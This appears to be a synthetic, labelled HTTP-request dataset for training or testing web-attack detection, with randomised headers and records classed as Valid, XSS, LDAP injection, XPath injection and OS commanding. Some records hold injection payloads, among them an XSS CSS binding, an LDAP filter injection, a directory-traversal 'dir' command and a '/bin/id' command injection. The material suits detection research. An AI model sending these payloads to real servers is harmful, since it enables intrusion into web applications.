Accept-Charset: koi8-r, big5;q=0.6, iso-8859-8;q=0.0, isiri-3342;q=0.7, x-mac-turkish;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 84.84.100.25
Cookie: uizoqevco=3419297544;ijchSivtfheln=fffnnOoseen0no0h;4systemXwhereaO=onzj\mia-
Cookie2: $Version="20"
Date: Fri, 22 May 09 06:15:02 GMT
ETag: W/"REogFZtBveGVsPzJt4"
Expect: ehEer=tyLm
From: ttui@snpa.it
If-Modified-Since: Fri, 12 Jan 07 02:14:35 GMT
If-Unmodified-Since: Fri, 23 Jul 04 05:52:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 6.1
Pragma: cah=mbEra9ev
Proxy-Authorization: Basic dGx0MHJzZTpybnN1
Authorization: Digest realm
Range: 327291-61,862127-16144
Referer: /uttm/oym4H/lsjtyff/lhlex/ssakraoy.mp3
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 5.2; 2a-hk; rv:9.9.5) Gecko/79940074
UA-CPU: MIPS
UA-Disp: 184,729,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 151x5069
Via: 4.7 98.217.162.41:98
Transfer-Encoding: identity
Upgrade: me9/6.2, nno/3.7, hbz6km/5.5
Warning: 358 31.230.86.11 "lxeoteiukr" "Sun, 20 Feb 05 06:39:18 GMT"
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 169658990624449042
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20504
Start - Id: 47262
class: XSS
GET /ssjH/Ycnd8U8/DXnxQK/dHtrlDoiidtac9p.jsp?OcnmQnr=mo2&ax=%3Cform%2Bname%3DTaautt+++%3E%3Cselect%2Bname%3Dbtw+%3Ehttp%3A%2F%2Fwww.i5inat.com%2Fteeet%2F%3F%3C%2Fselect+++%3E%3C%2Fform%3E&8s=pN7%3E2u0sceh&rae=%5D+rhy+biiloh HTTP/1.1
Host: www.eGresyheCe.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: e3qleo5=sd
Client-ip: 10.37.184.28
Cookie: rI=:hediryOtue:;phy=eb20ebrlecme;95aontwk=sallediao2lcort;reu=nEft6i5;ncargntu=0670721;uLFx6S6BX=mtn
Cookie2: $Version="0"
Date: Wed, 05 Aug 09 14:06:25 CET
ETag: W/"yzL8BLso-5YD3ekd"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Sun, 24 Jan 10 03:34:57 UTC
If-Match: "0iaisxF_ktG4-fr"
If-None-Match: *
If-Range: Thu, 04 Mar 10 12:02:16 UTC
Max-Forwards: 5303
MIME-Version: 3.6
Pragma: c=g
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Basic b2VucTc6aWhlZm5Fbg==
Range: -1,528-520677
Referer: http://www.omtt.be/c4hripee/desyai.jsp
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/3.8 (compatible; MSIE 4.9; Win 9x; tlif1; pxoi; ccele1elot)
UA-CPU: Sparc
UA-Disp: 571,3575,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: 4.9 122.195.134.4, 7.6 www.extdY.shtml, FTP/2.9 171.199.198.106:96
Transfer-Encoding: deflate
Upgrade: hth/1.0
Warning: 109 34.121.129.24 "7lqe" "Mon, 29 Oct 07 23:17:08 CET"
X-Forwarded-For: 5.39.123.102
X-Serial-Number: 15152704800
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47262
Start - Id: 37573
class: LdapInjection
PUT /LsTaianhojtt/child3t.hlqboot.iniPobpxr/hcBlALPgQ0rmhjB/sz5ee0/EFYOwO@ZRy/fudore/icdBTSgedv/iuPB8UXEW/t96ou4/cSesisranieeAdenyt.dll? HTTP/1.0
Content-Length: 232
Content-Language: Gtosa
Content-Encoding: identity
Content-Location: http://www.zlmtnl.gov/g5Sls/nssnsnu/snnC9/4ODDvZna.pdf
Content-MD5: ZWVhdERhY3Q2ZG9lZmFweg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Mar 04 06:54:28 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: www.Yt62ont.be
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce;q=0.0, gb2312;q=0.9
Accept-Encoding: identity, deflate;q=0.3, gzip, compress
Accept-Language: wrrcbn8-hsetsahy;q=0.5
Cache-Control: agri8E='rsaerbzL'
Client-ip: 234.104.82.80
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="03"
Date: Sat, 03 Apr 10 16:48:35 CET
ETag: "lkznzPusbq5lQMIvZeSR"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Mon, 06 Nov 06 06:14:16 CET
If-Unmodified-Since: Mon, 06 Mar 06 23:22:28 GMT
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Thu, 16 Feb 06 19:31:45 CET
Max-Forwards: 4692
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: Basic YndhdmZiOjV5d2lr
Range: 36-,-7
Referer: /jOraeu6/8sin/ahrhnE/edsssntd/ieour0.pl
TE: gzip;q=0.6,trailers
Trailer: If-None-Match
User-Agent: olZlrdyd/6.4
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 223x382
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: fwfa4G; traj9y=Sargave
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

eSkco=97&mpfsgnDx=l0&1nsfettteinel=qjypPszfm6oogArhiY&eaoiptaIi=fZ_P7d2Zo-&ra=$slias?7ao-d&Otuhto=81383&Omeobgzbtyrhm=elt&yugeitt5=>zgsrcp&rasap2eunryw=)   (|(    cn=*o  'brien*   )(mail  =*o'brien* )    

End - Id: 37573
Start - Id: 3328
class: Valid
GET /eErctnua/VLiju/Csffipisrplnsaedfs/mXKCUqLL/i2dahemh4iwmto/64oe/t7w.tiff?e1Aons1tRbo=s02&entebih8e=38918&tRbt=791&yaeuAwm=65656680&KhppIIenph-7K=wnowh%3C2du%26&sEottlxbN9de=rUF2Rgw&rgoiLtdm0inwe=4&aEavitlenriwcp=nt1lt&esnA=uhQ&vrOihm1epeto97=ir+hrme HTTP/1.1
Host: www.lieed.be
Connection: keep-alive
Accept: image/*;q=0.1, application/x-tar;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: emo-cb, tt-a3Imoe;q=0.9, Mu8-tn
Cache-Control: oeu9a='shrst'
Client-ip: 4.85.59.141
Cookie: Z2ihtaccesRvz=8
Cookie2: $Version="1"
Date: Mon, 26 Jun 06 01:18:39 GMT
ETag: "PCy.cZ17f2C_-noJ-rfq"
Expect: wd2e
From: ooze@mtz9qt.fr
If-Modified-Since: Sun, 11 Dec 05 23:07:40 UTC
If-Unmodified-Since: Mon, 24 Oct 05 11:34:38 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Oct 07 01:48:59 UTC
Max-Forwards: 0024
MIME-Version: 7.0
Pragma: strds=toS4g
Proxy-Authorization: Basic ZXR5YWx1Om5pYThl
Authorization: Basic ZWVlYXNzWGU6M2F4SXR5aQ==
Range: -842455
Referer: /iiecetnm.php4
TE: chunked,chunked,trailers
Trailer: If-Match
User-Agent: o6tmnsosseur1N
UA-CPU: MIPS
UA-Disp: 2815,9400,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 701x9468
Via: 2.7 147.66.211.227, FTP/5.9 www.iajaxs.html
Transfer-Encoding: sz2Id
Upgrade: e7H/3.8
Warning: 102 www.eipsn.js "e5Ie" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 1661019854
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3328
Start - Id: 35796
class: XPathInjection
GET /x98Mg_CF/auiiuhcifeenofweQmee/aYFDK9L17OGxOm/nss9YCEPAaqJBL/5h.jpg?DoNuordvke7=%28i+++++%3C+count%28i2ip%2Fchild%3A%3Atext%28%29%29++and++++j+%3C++++count%28ceio%2Fchild%3A%3Acomment%28%29%29+++++and+k++++%3C++count%28nndots%2Fchild%3A%3A*%29+++%29 HTTP/1.0
Host: www.mieo.gov
Connection: oenbry
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="0"
Date: Mon, 15 Jan 07 06:28:53 GMT
ETag: "BC6ce8C_dnKt4s0Z."
Expect: 100-continue
From: o6sanad@eton8m.net
If-Modified-Since: Fri, 18 Feb 05 06:02:57 GMT
If-Unmodified-Since: Sun, 08 Jan 06 10:17:12 UTC
If-Match: *
If-None-Match: *
If-Range: "TD6isthNtm7jY26y"
Max-Forwards: 1
MIME-Version: 1.8
Pragma: io3mm3dt='Urr'
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Referer: http://www.6aWh.st/odyea8/uaas/ikgr/uwm7e.php3
TE: trailers,trailers
Trailer: Expect
User-Agent: 5etdid/9.5.0
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 1bNUer/1.3 245.161.192.158, 8.2 www.dolma.gif, ual/3.0 6.114.3.31
Transfer-Encoding: deflate
Upgrade: n2smtz/0.7
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 19.150.15.185
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35796
Start - Id: 7633
class: Valid
POST /xK60kA/akcFNg1UW7cB0F/ikUxF6ve/ZFHQBSRiXJautoexecA/EnnK/iemnddsDnn/dlZ-_R@QF93QabC1ui.js? HTTP/1.1
Content-Length: 190
Content-Language: Odh,iaesOr,rot6te
Content-Encoding: compress
Content-Location: /enEe/1aueaEi/rmpfTaxg/ioet/iylB.tiff
Content-MD5: ZXVkYW5taDV3aGZ0U29pdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 05:53:15 UTC
Last-Modified: Thu, 25 Oct 07 03:37:59 UTC
Host: 226.19.32.250
Connection: keep-alive
Accept: video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Hl-6C;q=0.6, haE-dl;q=0.9, 9iFtic-riuAigg, eSIrthke-ifas;q=0.6, Ynoot-dt;q=0.6
Cache-Control: only-if-cached
Client-ip: 105.240.119.173
Cookie: eh8gpnhcrccFoa=hna;hwao=3682853;iddocument14dropiLSL5=letsexetbkuownthoe
Cookie2: $Version="03"
Date: Sat, 28 May 05 14:04:51 UTC
ETag: W/"10tj21_gSeVUC7FKLW5"
Expect: 100-continue
From: 5o2toN@trwo.com
If-Modified-Since: Tue, 05 Sep 06 12:51:24 UTC
If-Unmodified-Since: Sun, 22 Jul 07 22:27:28 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jun 05 05:07:07 CET
Max-Forwards: 826
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Basic cjYzcGpzcnM6bGVzZQ==
Authorization: NTLM c3RlcnRhZWZyaG5vbWV0bXdldWh0ZWdNR3llZnplOWFt
Range: 68406-050682,618113-29,1-9
Referer: http://aahqe.be/esxi.gz
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 9.4; 20-4e; rv:9.3.7) Gecko/58359958
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color16
Via: 8.5 www.anedxise.js:1082
Transfer-Encoding: identity
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 763 www.tBeic.jpeg "daariegtelcya7h" "Tue, 12 Oct 04 10:28:02 CET"
X-Forwarded-For: 59.74.190.194
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

g9nka98tyn=q41hct1nbarm&orAv_SY1oKuDH=atbu&ldwea6t=27376&0htE=274&7d.xml=el0xh2Tesroet7ora&lkstieesan=eet7Whar(a ssEt&8aBzwherehjTf9=IZoo;e%&l6e-likenq=jn &exeudiyeotr=uBPQcu.YRKAz

End - Id: 7633
Start - Id: 38689
class: LdapInjection
GET /rblY2fxLNbXB6i/1heheAbiydeeami/eiUo2/iu/hWn2p8fuIlMS9LIz_R4/TDl4/_OMXV/toe1Ai1cen/q3Xv0/eOaf.dll?yrzoH3positionzqG=218&errca=cthomee&iNRB0rwget_=0691&fcetbnmuur1=4491&naxc55soir7uhb=%5Boe%3Ah&aafdor7pT=%3FaCau9&clilshn=%29%28+++%7C+%28daq%3DsTt*%29 HTTP/1.1
Host: www.9porIhrlMu.be
Connection: esoFyue
Accept: */*;q=0.5
Accept-Charset: x-mac-greek;q=0.3
Accept-Encoding: identity;q=0.1
Accept-Language: yeteBra-arn, d5yaOb-21nEt
Cache-Control: no-transform
Client-ip: 19.47.61.99
Cookie: 8sa2oaaasT9xcwi=htpofec8nc(dsjl|io;m4nScsoe9lddnRw=50
Cookie2: $Version="63"
Date: Sat, 02 Oct 04 05:09:24 UTC
ETag: "EvxKQQHQRlpZyyner"
Expect: 100-continue
From: nTromT8u@pzcel.it
If-Modified-Since: Wed, 07 Nov 07 01:16:28 UTC
If-Unmodified-Since: Sun, 30 Apr 06 23:43:38 CET
If-Match: *
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: *
Max-Forwards: 6840
MIME-Version: 5.4
Pragma: nomesgt='nsbha5oe'
Proxy-Authorization: Digest realm
Authorization: Ns5wt sihbnas=Atnr6O
Range: 32-1,3888-481886
Referer: /mqteiaoe/eah9c18e/mlysesm/0Uwrzq.mdb
TE: deflate;q=0.7,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 1.3; ta-9n; rv:9.6.9) Gecko/97634519
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 908x4326
Via: 9.9 www.emejsr.gif
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 502 www.ssta3set.jpeg "SptsmeMga8ettons" "Wed, 02 Apr 08 05:31:51 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38689
Start - Id: 46819
class: XSS
POST /ns.1JA@.jpeg? HTTP/1.1
Content-Length: 210
Content-Language: 7X
Content-Encoding: deflate
Content-Location: http://oo0es.net/rzarico.php3
Content-MD5: aUV6d3R2YWVsR3RpYWU2dw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Mar 04 11:05:50 GMT
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: www.unst.de:38
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: nehleyy-s;q=0.0, sont2en-s, St6scaDr-tkfc;q=0.6
Cache-Control: iRl='oeonvld'
Client-ip: 24.39.240.157
Cookie: mjuI54GdYcrnw=5054961388;8ueeheifbIeg=9
Cookie2: $Version="9"
Date: Wed, 12 Mar 08 13:32:24 CET
ETag: W/"clqO4HlZF-77um5s4W"
Expect: taanns
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Sat, 29 Sep 07 19:10:27 UTC
If-Unmodified-Since: Wed, 08 Jun 05 02:54:00 GMT
If-Match: "UX8X8CcOtW5iCLhIO2"
If-None-Match: *
If-Range: *
Max-Forwards: 60
MIME-Version: 8.3
Pragma: ey='bohhde'
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZVVyZTYwaWZzM2VlaW9ycm1IZm5zZW90bTRDaHMyaDd1
Range: 175390-78,55-,908690-
Referer: /semu/ionpmr/rrd9lph/cnetlaaj/eslteE.doc
TE: trailers,gzip;q=0.3,trailers
Trailer: If-None-Match
User-Agent: edgrJkfs89 http://www.r7t8.gov
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: Rxqa3/5.6 www.1aoe.png, 2.3 85.210.165.210, exqitq/8.5 www.vndr3arh.tiff
Transfer-Encoding: identity
Upgrade: qarel/7.8, naafrl/3.9, kselon/3.6, id0E/3.2, eEEt/2.3
Warning: 517 www.5inoe.html "cs4tiEgn7ip" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AEand5a_WXZk=<div    style= "  binding:  url([http://www.ti.com/script/blRe.nsf]);    "    >&L6easosrct=jaoto8lqa&ICSd.t=tNdK5'tyotxp_lwhereyyu&bqnl4Nd=925081974&aasxaoael=1170

End - Id: 46819
Start - Id: 16888
class: Valid
GET /iwwgPXAZeohxJbvgU3A/pTetde/eec8u7oaUitTs/k.w/ru14v8/Ifoe/BD56euoN5logNpu/dgateipMrWaesn/t-QJx_acRpnP.php3?inslitsGk=taOEi&hCoqkee6d6io=iiTtn2t6nKrr7eA1je&rawnii=pSgR7OuCuT&neer=wL0EikZUr83&oArra65eNobjl=mlj%2Bftp%27&X4pH0aI@=rnaosIbk&8pucfa=7649653&esm=tac%3Bn HTTP/1.1
Host: www.dueeeoiJc.cz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: euc-tw, windows-1255;q=0.7
Accept-Encoding: identity, deflate
Accept-Language: O-ciohe1c;q=0.5, eaS-2a;q=0.7
Cache-Control: no-store
Client-ip: 122.52.30.220
Cookie: ism8hhtd8eH=0plinkechoj;ncNttocEesc=1sioytladt3le;drydhDsnocr=6;EsienzicpwbrY=deeuflGejtq4r;siislarnglshrh=002
Cookie2: $Version="7"
Date: Tue, 07 Aug 07 16:17:34 UTC
ETag: W/"pAs53GLp9HssNJAKf5"
Expect: rawdunO=nst6
From: teai@aeo5nc1njD.biz
If-Modified-Since: Sun, 05 Dec 04 13:13:50 UTC
If-Unmodified-Since: Sun, 08 Mar 09 16:08:50 CET
If-Match: "RkuUz7V5r8dQaEKV"
If-None-Match: "Gtagqgg0lMg_ZrO"
If-Range: Tue, 05 Feb 08 21:09:40 GMT
Max-Forwards: 98
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: dstnTd hnf4=inlye
Range: -79,-459040
Referer: /ttfyr/ltepcs/Ei9tA.cfm
TE: gzip;q=0.3,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.3 (X11; U; Solaris 1.5; er-Ca; rv:8.8.0) Gecko/67731972
UA-CPU: 68000
UA-Disp: 3594,2182,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 124x8989
Via: krQ/4.5 154.254.209.85
Transfer-Encoding: gzip
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 024 248.14.211.213 "tommso7teoesEnlsd" 
X-Forwarded-For: 164.60.181.249
X-Serial-Number: 81135810517
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16888
Start - Id: 5847
class: Valid
PUT /VmF7Hreplace3s9/wliocjreai/eqwlmGeNrte/rgfrE/oxbahoehtteveake4mu/wGJm0R8v/tzREGidBSgB79pv/X233.hdJ-T./Saiqesns/cmhPHIQe/sdo.shtml? HTTP/1.1
Content-Length: 79
Content-Language: crvc
Content-Encoding: compress
Content-Location: /Eirsttw/eBeet/olwt0h6w.js
Content-MD5: aWZwbXVocjRpdGhlb3Jzcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Dec 04 19:08:39 CET
Last-Modified: Sat, 13 Mar 10 18:23:08 CET
Host: www.3icro.net:28
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, identity
Accept-Language: cnaonn-rh1;q=0.6
Cache-Control: hd='nnmsr'
Client-ip: 127.171.94.127
Cookie: cion2nrepeuP=ntjcopy;u5msae66=67;o73equt=049;aonEE6heynt=eg;smge4eu3Honr=irSG5
Cookie2: $Version="231"
Date: Sat, 09 Jan 10 12:33:08 UTC
ETag: W/"kRw4@j2WY_ETfJv-_Pu"
Expect: roBgee
From: sePnirh@e4qne.de
If-Modified-Since: Mon, 27 Nov 06 11:59:03 UTC
If-Unmodified-Since: Sun, 09 Dec 07 16:08:27 CET
If-Match: "zA3.IMGCfwt@xc7X"
If-None-Match: *
If-Range: "sggRUaj5s@Sj3-P"
Max-Forwards: 59
MIME-Version: 8.7
Pragma: a='kIr'
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=MD5-sess
Range: 7412-
Referer: http://www.m7hnd.cz/2ree/epIxUr.mpg
TE: trailers,deflate;q=0.1
Trailer: Accept-Language
User-Agent: eahdau5bscmaq9s6tCwo
UA-CPU: x86
UA-Disp: 746,1087,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3215x099
Via: atqha/7.1 147.5.192.146:8616, HTTP/5.6 180.13.29.76, tnmsa/6.8 www.4UeoUwty.js
Transfer-Encoding: gw5rI8
Upgrade: denqn/7.4, detea/0.8
Warning: 161 210.131.126.108 "bzrjUioaiertes" "Tue, 24 Jun 08 01:01:36 GMT"
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 8692230651
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

urbaamTa=6wdc3P@TB.J&iy6iot2rifpii=eglR9S jyh&RaiHAnakmkrz7=Sa&ahtAasgl=elcv0

End - Id: 5847
Start - Id: 42833
class: OsCommanding
GET /u3C@-iGFRclq_sh1g_/to/ombsGYwhTRty9I/fi@s.hhjwWCFSTBoySz9/9n-80.b-J/Teentxkp/7htpassV/yQcJQKch/aonAe/na.swf?doTU3echo9EPi=%3E7%3Dghac&childjSplog3LLI4qhtpass=eiq&rai7=wiformdunioni5s1-&nUCJxUkQ=ra0&mo=%7C+dir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C&a7=2 HTTP/1.0
Host: www.e9bmumdb.org:80
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.2, x-mac-roman
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 188.218.7.177
Cookie: h0H8mocha1Z8gM=dun~mwp-autoexecsNc;bcinliamn=3-NboaOmtt
Date: Tue, 12 May 09 08:06:31 GMT
ETag: "pei1_qWjREV5RDdbfc"
Expect: 100-continue
From: deCV@nnnan.ch
If-Modified-Since: Sat, 24 Mar 07 09:41:32 GMT
If-Unmodified-Since: Wed, 17 Oct 07 02:50:17 UTC
If-Match: "qI24.dZDibJe3hmEe"
If-None-Match: *
If-Range: Sat, 21 Jul 07 21:44:10 GMT
Max-Forwards: 436
MIME-Version: 7.9
Authorization: Basic dWVhUDpybm1ybWU=
Range: 2-3,62-,037879-912
Referer: /7ttnEar/lkea.swf
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/0.0 (Windows; U; Win 9x 0.2; Sa-to; rv:7.1.4) Gecko/03453557
UA-CPU: Sparc
UA-Disp: 063,6155,16
UA-Color: color16
Via: HTTP/6.9 www.oNss.html:3, bte/6.5 168.41.44.75, HTTP/6.2 249.90.77.235
Transfer-Encoding: deflate
Upgrade: NhTeWO/2.9, teisee/0.9
X-Forwarded-For: 209.98.157.41
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42833
Start - Id: 8732
class: Valid
GET /ecy3tn3g/sCz5cX33Y4esKQSUWL7/a5aFn/tq4Tp3BcKbj3MxkW4/otnihoodpds4yblti/tymrdzd/rAE/ixhddeuenxk1It.aspx? HTTP/1.0
Host: 248.69.40.102
Connection: iiee8ni
Accept: */*;q=0.8
Accept-Charset: iso-8859-8;q=0.9, ks_c_5601-1987, x-mac-greek;q=0.4, iso-2022-kr;q=0.6, cp-950;q=0.1
Accept-Encoding: identity;q=0.0, gzip, identity;q=0.6, compress;q=0.5
Accept-Language: t-lao;q=0.0, Lr-hvEex1;q=0.8, Neaeerne-uto;q=0.8, srweGGes-piUaen;q=0.9
Cache-Control: min-fresh=305
Client-ip: 110.7.237.199
Cookie: ezt93c2aSrt=39643;9as7=3hHe;7loeutieUhk=n o/insertlocationRibhng$
Cookie2: $Version="57"
Date: Fri, 01 Jan 10 11:52:39 UTC
ETag: W/"yN48kMoIMTdNdg3vEW"
Expect: 100-continue
From: mteeb@o92wOhll.cz
If-Modified-Since: Wed, 30 Nov 05 22:07:46 GMT
If-Unmodified-Since: Sun, 07 Jan 07 17:25:42 UTC
If-Match: "c88hSOKvRzVlVqMI"
If-None-Match: *
If-Range: "tHfkeM79v3K5lAqVyDm"
Max-Forwards: 062
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM dDFlb2lFa2lycG5vbnNhckN0T3lzd2VpMXJWZ2hFeWN3dHRlYTBkc1ZlZEhvZXQ=
Authorization: 5earle aygei=a5rGt
Range: -76,90082-8624,-748
Referer: /emti.mpg
TE: gzip
Trailer: If-Match
User-Agent: sindw/8.1.1.0.3
UA-CPU: PowerPC
UA-Disp: 0762,192,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 559x025
Via: 6.4 www.1aDih.png, 0.4 69.216.52.166
Transfer-Encoding: compress
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 196 69.31.102.112 "meOretmuAnoa24aNg" "Sun, 13 Nov 05 21:30:28 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8732
Start - Id: 34303
class: Valid
PUT /kda4Blde0adbe/7C/eecHA7or/nDDVWH3w/LnF/trCq/zlxapint/R1xFGautoexec7/vNkTHtbr/1G.exe? HTTP/1.0
Content-Length: 170
Content-Language: gad4,rourkec,8
Content-Encoding: identity
Content-Location: /adMnM0Ne/ceotsa/ieuklo/oinla.jpeg
Content-MD5: b04yOGlkZTVpVDBvRXlzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jul 09 10:32:46 CET
Last-Modified: Sun, 20 Aug 06 21:01:10 UTC
Host: www.HioiTO62an.uk
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, compress;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 23.213.144.232
Cookie: horaoteErz1=8;mEuenarin=rDaat
Cookie2: $Version="3"
Date: Mon, 26 Sep 05 01:47:00 CET
ETag: W/"uPZPrKAQ8vvVUxRYte@h"
Expect: dhub
From: dtei@TejuhiaoMh.uk
If-Modified-Since: Tue, 27 Apr 10 20:15:47 CET
If-Unmodified-Since: Tue, 06 Nov 07 11:55:50 GMT
If-Match: *
If-None-Match: *
If-Range: "wh1LSOXbg1ni5NJ-63A"
Max-Forwards: 7924
MIME-Version: 7.7
Pragma: iT='4nfe'
Proxy-Authorization: dooif easg=eyxlos
Authorization: Basic YmVkdzpwZGVibGhl
Range: -18,2241-
Referer: /lenad/e3ys/snne.png
TE: trailers,gzip,gzip
Trailer: If-Range
User-Agent: e2Y852M. http://www.H9htrotd.it
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 232x3371
Via: FTP/1.4 255.48.166.153, 7.5 www.cean.html:469
Transfer-Encoding: ay2ag; 2y5a=Thsd
Upgrade: ioige/2.6, siaeai/5.7, avpiP/4.6, 4l2/9.9
Warning: 720 www.adln4.tiff:115 "T5aUbnb" "Sun, 26 Oct 08 21:05:18 GMT"
X-Forwarded-For: 103.28.147.12
X-Serial-Number: 437295181628210
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

momrtxo=6&pQEjeicjsmNDti= Atitwp-&dhbStKt=eabgsoundh5j&jssUasmitrTE=1030&S4nhekrzsea=~z6&ete=]bnin~bKoss1N&5mochau5=zftr<&esnNueujreuhe=tugbin   e;g$2wz6a5ebn

End - Id: 34303
Start - Id: 43213
class: OsCommanding
GET /wsrecLmrNid.swf?OsAgwKOG4nCa=senen&6Osdeeanspmta=sa4_tV_Z4&te7raNog9noEk=yD08%40B&-ZdkFaNZsystemq-5=74&TcPca.A7KiXI=htdsiiodcspmnsaa&pfuuo6oSu=t%40&weuIScotpbt=4mmb+&9Wb.9rmh=inserto&iSimnl3rlS=oiqcAKNcC1&zQ0Emv.1VcatM=aG2&ecrtodssrgm=%5C%3B+%5C%2Fbin%5C%2Fid++++%3B&doe61m=uRo%28includeGLdqbodysioptoSeFoe&p9Cmocha=0751787537 HTTP/1.0
Host: www.owatslm8S.gov
Connection: tb9t
Accept: image/png
Accept-Charset: iso-8859-8-i;q=0.4, x-mac-cyrillic;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 59.228.253.1
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="350"
